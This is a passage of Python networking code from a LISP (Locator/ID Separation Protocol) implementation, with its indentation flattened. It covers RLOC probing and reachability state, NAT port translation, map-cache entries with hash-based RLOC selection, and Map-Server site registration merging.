self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length is 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
